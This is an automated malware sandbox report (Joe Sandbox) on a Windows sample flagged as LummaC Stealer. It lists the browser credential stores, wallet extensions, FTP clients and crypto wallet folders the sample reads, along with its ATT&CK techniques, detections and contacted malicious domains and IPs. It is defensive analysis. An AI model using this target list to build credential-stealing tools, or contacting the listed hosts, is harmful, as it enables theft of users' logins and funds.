Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior

Source: Yara match	File source: 00000001.00000003.1554884834.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SoftWare(1).exe1.exe PID: 2340, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: Process Memory Space: SoftWare(1).exe1.exe PID: 2340, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	11 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SoftWare(1).exe1.exe	100%	Avira	TR/Kryptik.jihlg

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://citydisco.bet/m	0%	Avira URL Cloud	safe
https://citydisco.bet:443/gdJIS	100%	Avira URL Cloud	malware
https://citydisco.bet/3	0%	Avira URL Cloud	safe
https://citydisco.bet/kI	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJIST	0%	Avira URL Cloud	safe
https://citydisco.bet:443/gdJISl	0%	Avira URL Cloud	safe
https://citydisco.bet/:	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJIS0	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJISl	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJIS=.	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJIS4	0%	Avira URL Cloud	safe
https://citydisco.bet/	0%	Avira URL Cloud	safe
crosshairc.life/dAnjhw	100%	Avira URL Cloud	malware
https://citydisco.bet:443/gdJISJAD2	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJIS	100%	Avira URL Cloud	malware
https://citydisco.bet/gdJISD	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJISG	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
citydisco.bet	188.114.96.3	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
mrodularmall.top/aNzS	false		high
bugildbett.top/bAuz	false		high
jowinjoinery.icu/bdWUa	false		high
legenassedk.top/bdpWO	false		high
citydisco.bet/gdJIS	false		high
htardwarehu.icu/Sbdsa	false		high
https://citydisco.bet/gdJIS	false	Avira URL Cloud: malware	unknown
crosshairc.life/dAnjhw	true	Avira URL Cloud: malware	unknown
cjlaspcorne.icu/DbIps	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://citydisco.bet/m	SoftWare(1).exe1.exe, 00000001.00000003.1580306859.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1601482730.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602098251.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602360035.0000000000C13000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://citydisco.bet:443/gdJIS	SoftWare(1).exe1.exe, 00000001.00000002.1625670673.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/3	SoftWare(1).exe1.exe, 00000001.00000003.1601482730.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602098251.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602360035.0000000000C13000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://citydisco.bet/kI	SoftWare(1).exe1.exe, 00000001.00000003.1623669679.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1601482730.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602098251.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1624372039.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000002.1625502494.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602360035.0000000000C13000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://citydisco.bet/gdJIST	SoftWare(1).exe1.exe, 00000001.00000003.1498172157.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://citydisco.bet:443/gdJISl	SoftWare(1).exe1.exe, 00000001.00000003.1580041579.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1524404877.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1522858103.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1523161611.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://citydisco.bet/:	SoftWare(1).exe1.exe, 00000001.00000003.1601482730.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602098251.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602360035.0000000000C13000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	SoftWare(1).exe1.exe, 00000001.00000003.1523402093.00000000032CE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	SoftWare(1).exe1.exe, 00000001.00000003.1523402093.00000000032CE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	SoftWare(1).exe1.exe, 00000001.00000003.1524502771.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/gdJIS=.	SoftWare(1).exe1.exe, 00000001.00000003.1623669679.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1624372039.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000002.1625502494.0000000000C14000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/gdJIS0	SoftWare(1).exe1.exe, 00000001.00000003.1549986383.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1550356936.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/v20	SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/gdJISl	SoftWare(1).exe1.exe, 00000001.00000003.1580306859.0000000000C20000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://citydisco.bet/	SoftWare(1).exe1.exe, 00000001.00000003.1623669679.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1580306859.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1601482730.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602098251.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1624372039.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000002.1625502494.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602360035.0000000000C13000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	SoftWare(1).exe1.exe, 00000001.00000003.1523402093.00000000032CE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	SoftWare(1).exe1.exe, 00000001.00000003.1523402093.00000000032CE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	SoftWare(1).exe1.exe, 00000001.00000003.1523402093.00000000032CE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/gdJIS4	SoftWare(1).exe1.exe, 00000001.00000003.1549986383.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtabv209h	SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	SoftWare(1).exe1.exe, 00000001.00000003.1524502771.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet:443/gdJISJAD2	SoftWare(1).exe1.exe, 00000001.00000002.1625670673.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1580041579.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://citydisco.bet/gdJISG	SoftWare(1).exe1.exe, 00000001.00000003.1623669679.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1624372039.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1601482730.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602098251.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000002.1625502494.0000000000C14000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gemini.google.com/app?q=	SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/gdJISD	SoftWare(1).exe1.exe, 00000001.00000003.1580204979.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	citydisco.bet	European Union		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1637270
Start date and time:	2025-03-13 13:32:16 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SoftWare(1).exe1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 35 Number of non-executed functions: 159
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 150.171.28.10, 2.19.96.17
Excluded domains from analysis (whitelisted): www.bing.com, slscr.update.microsoft.com, g.bing.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:33:26	API Interceptor	7x Sleep call for process: SoftWare(1).exe1.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	kVPzMgJglW.exe	Get hash	malicious	FormBook	Browse	www.serenityos.dev/dntg/
	tnZI8EzSx3.exe	Get hash	malicious	FormBook	Browse	www.fkrvhaupjtc.info/sdhm/
	7zKn77RsRX.exe	Get hash	malicious	FormBook	Browse	www.serenityos.dev/dntg/
	hQaXUS5gt0.exe	Get hash	malicious	FormBook	Browse	www.serenityos.dev/dntg/
	zzSk99EqY0.exe	Get hash	malicious	FormBook	Browse	www.fkrvhaupjtc.info/sdhm/
	2k3GtCY6Zz.exe	Get hash	malicious	FormBook	Browse	www.fkrvhaupjtc.info/nhmj/
	3tEL1ZRXA6.exe	Get hash	malicious	FormBook	Browse	www.marposet.shop/6ixs/?Ar6T=oN0T/Esi7H2jJ4TMjw8b93BQPnEdNzyQiBUPeT1k8Z/eibB9ghV+qpvP7NsuhjacLnuX6HraU4xmdMUu2umYnCC8s1rtYFvj99qSyPPCwvQggIKSHQ==&Lfpd=o6ndcl
	2rvyZc27tz.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/50g8/
	INVOICE 4562.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/jjft/
	Payment-031025-pdf.exe	Get hash	malicious	FormBook	Browse	www.ezjytrkuqlw.info/zsr7/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
citydisco.bet	Galaxy Swapper v2.0.3.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	13s1HMkHKv.exe	Get hash	malicious	Amadey, DarkVision Rat, Fallen Miner, LummaC Stealer	Browse	188.114.96.3
	SoftWare(1).exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	Kiddion's Modest Menu v.1.0.0.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	188.114.96.3
	Launcher_v2.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	ModMenu.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
